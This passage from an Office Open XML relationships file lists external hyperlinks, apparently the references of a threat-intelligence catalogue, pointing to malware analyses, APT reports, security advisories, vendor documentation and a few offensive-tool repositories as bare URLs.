Target="https://riskiq.com/blog/labs/magecart-british-airways-breach/" TargetMode="External"/><Relationship Id="rId2364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea" TargetMode="External"/><Relationship Id="rId2571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2020/08/28/how-notarization-works/" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/" TargetMode="External"/><Relationship Id="rId988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shellster/DCSYNCMonitor" TargetMode="External"/><Relationship Id="rId1173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/" TargetMode="External"/><Relationship Id="rId1380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" TargetMode="External"/><Relationship Id="rId2017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" TargetMode="External"/><Relationship Id="rId2224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/agent-btz-a-source-of-inspiration/58551/" TargetMode="External"/><Relationship Id="rId2669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf" TargetMode="External"/><Relationship Id="rId2876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Public-key_cryptography" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/" TargetMode="External"/><Relationship Id="rId750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py" TargetMode="External"/><Relationship Id="rId848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html" TargetMode="External"/><Relationship Id="rId1033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2" TargetMode="External"/><Relationship Id="rId1478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" TargetMode="External"/><Relationship Id="rId1685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/" TargetMode="External"/><Relationship Id="rId1892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" TargetMode="External"/><Relationship Id="rId2431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries" TargetMode="External"/><Relationship Id="rId2529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/" TargetMode="External"/><Relationship Id="rId2736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/kb/ssl-certificate-installation.htm" TargetMode="External"/><Relationship Id="rId708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" TargetMode="External"/><Relationship Id="rId915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" TargetMode="External"/><Relationship Id="rId1240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" TargetMode="External"/><Relationship Id="rId1338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man1/at.1p.html" TargetMode="External"/><Relationship Id="rId1545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/" TargetMode="External"/><Relationship Id="rId2943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" TargetMode="External"/><Relationship Id="rId1100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.menlosecurity.com/blog/new-attack-alert-duri" TargetMode="External"/><Relationship Id="rId1405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf" TargetMode="External"/><Relationship Id="rId1752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms677949.aspx" TargetMode="External"/><Relationship Id="rId2803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html" TargetMode="External"/><Relationship Id="rId1612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/" TargetMode="External"/><Relationship Id="rId1917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf" TargetMode="External"/><Relationship Id="rId3065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research" TargetMode="External"/><Relationship Id="rId2081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" TargetMode="External"/><Relationship Id="rId2179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" TargetMode="External"/><Relationship Id="rId2386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sygnia.co/golden-saml-advisory" TargetMode="External"/><Relationship Id="rId2593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/press-release/file/1092091/download" TargetMode="External"/><Relationship Id="rId772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/" TargetMode="External"/><Relationship Id="rId1195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html" TargetMode="External"/><Relationship Id="rId2039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" TargetMode="External"/><Relationship Id="rId2246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/octopus-infested-seas-of-central-asia/88200/" TargetMode="External"/><Relationship Id="rId2453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" TargetMode="External"/><Relationship Id="rId2660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" TargetMode="External"/><Relationship Id="rId2898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/cc723564(v=technet.10)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/logging/docs/audit/configure-data-access" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheWover/donut" TargetMode="External"/><Relationship Id="rId1055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hfiref0x/UACME" TargetMode="External"/><Relationship Id="rId1262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/en-us/HT201710" TargetMode="External"/><Relationship Id="rId2106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/rclone-mega-extortion/" TargetMode="External"/><Relationship Id="rId2313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/" TargetMode="External"/><Relationship Id="rId2520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490880.aspx" TargetMode="External"/><Relationship Id="rId2758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" TargetMode="External"/><Relationship Id="rId2965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/" TargetMode="External"/><Relationship Id="rId937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html" TargetMode="External"/><Relationship Id="rId1122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/docs/17802.pdf" TargetMode="External"/><Relationship Id="rId1567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)" TargetMode="External"/><Relationship Id="rId1774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover" TargetMode="External"/><Relationship Id="rId1981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html" TargetMode="External"/><Relationship Id="rId2618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks" TargetMode="External"/><Relationship Id="rId2825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/vector_sec/status/896049052642533376" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" TargetMode="External"/><Relationship Id="rId1427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/" TargetMode="External"/><Relationship Id="rId1634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/dd252791.aspx" TargetMode="External"/><Relationship Id="rId1841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection" TargetMode="External"/><Relationship Id="rId3087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console" TargetMode="External"/><Relationship Id="rId1939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.org/blog/blog_0x49.html" TargetMode="External"/><Relationship Id="rId1701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/" TargetMode="External"/><Relationship Id="rId2170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/clarketm/s3recon" TargetMode="External"/><Relationship Id="rId2268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader" TargetMode="External"/><Relationship Id="rId3014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://libzip.org/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/mdm" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/technotes/tn2459/_index.html" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" TargetMode="External"/><Relationship Id="rId794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml" TargetMode="External"/><Relationship Id="rId1077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/" TargetMode="External"/><Relationship Id="rId2030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html" TargetMode="External"/><Relationship Id="rId2128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/threat-detection-report/threats/qbot/" TargetMode="External"/><Relationship Id="rId2475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html" TargetMode="External"/><Relationship Id="rId2682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20111004014029/http:/www.trusteer.com/sites/default/files/Carberp_Analysis.pdf" TargetMode="External"/><Relationship Id="rId2987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/weblog/archives/00002576.html" TargetMode="External"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf" TargetMode="External"/><Relationship Id="rId861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" TargetMode="External"/><Relationship Id="rId959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/vpc/docs/packet-mirroring" TargetMode="External"/><Relationship Id="rId1284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/" TargetMode="External"/><Relationship Id="rId1491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" TargetMode="External"/><Relationship Id="rId1589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/security/4053440" TargetMode="External"/><Relationship Id="rId2335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" TargetMode="External"/><Relationship Id="rId2542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage" TargetMode="External"/><Relationship Id="rId721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" TargetMode="External"/><Relationship Id="rId1144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes" TargetMode="External"/><Relationship Id="rId1351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" TargetMode="External"/><Relationship Id="rId1449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf" TargetMode="External"/><Relationship Id="rId1796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738" TargetMode="External"/><Relationship Id="rId2402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20190508170055/https:/www.symantec.com/security-center/writeup/2000-122010-2655-99" TargetMode="External"/><Relationship Id="rId2847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wald0.com/?p=179" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html" TargetMode="External"/><Relationship Id="rId819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html" TargetMode="External"/><Relationship Id="rId1004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" TargetMode="External"/><Relationship Id="rId1211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf" TargetMode="External"/><Relationship Id="rId1656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" TargetMode="External"/><Relationship Id="rId1863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" TargetMode="External"/><Relationship Id="rId2707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" TargetMode="External"/><Relationship Id="rId2914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" TargetMode="External"/><Relationship Id="rId1309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lab52.io/blog/wirte-group-attacking-the-middle-east/" TargetMode="External"/><Relationship Id="rId1516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml" TargetMode="External"/><Relationship Id="rId1723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview" TargetMode="External"/><Relationship Id="rId1930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html" TargetMode="External"/><Relationship Id="rId2192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sslshopper.com/ssl-checker.html" TargetMode="External"/><Relationship Id="rId3036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x26.html" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.attackify.com/blog/rundll32_execution_order/" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html" TargetMode="External"/><Relationship Id="rId2052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming" TargetMode="External"/><Relationship Id="rId2497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/04/introducing-rokrat.html" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/" TargetMode="External"/><Relationship Id="rId676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/" TargetMode="External"/><Relationship Id="rId883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/03/dissecting-netwire-phishing-campaign-usage-of-process-hollowing.html" TargetMode="External"/><Relationship Id="rId1099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/" TargetMode="External"/><Relationship Id="rId2357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512" TargetMode="External"/><Relationship Id="rId2564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar" TargetMode="External"/><Relationship Id="rId1166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" TargetMode="External"/><Relationship Id="rId1373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/dd393574.aspx" TargetMode="External"/><Relationship Id="rId2217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/nickel-gladstone" TargetMode="External"/><Relationship Id="rId2771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" TargetMode="External"/><Relationship Id="rId2869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/HTML_Application" TargetMode="External"/><Relationship Id="rId743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.endgame.com/blog/technical-blog/hunting-memory" TargetMode="External"/><Relationship Id="rId950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freedesktop.org/wiki/Software/systemd/" TargetMode="External"/><Relationship Id="rId1026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 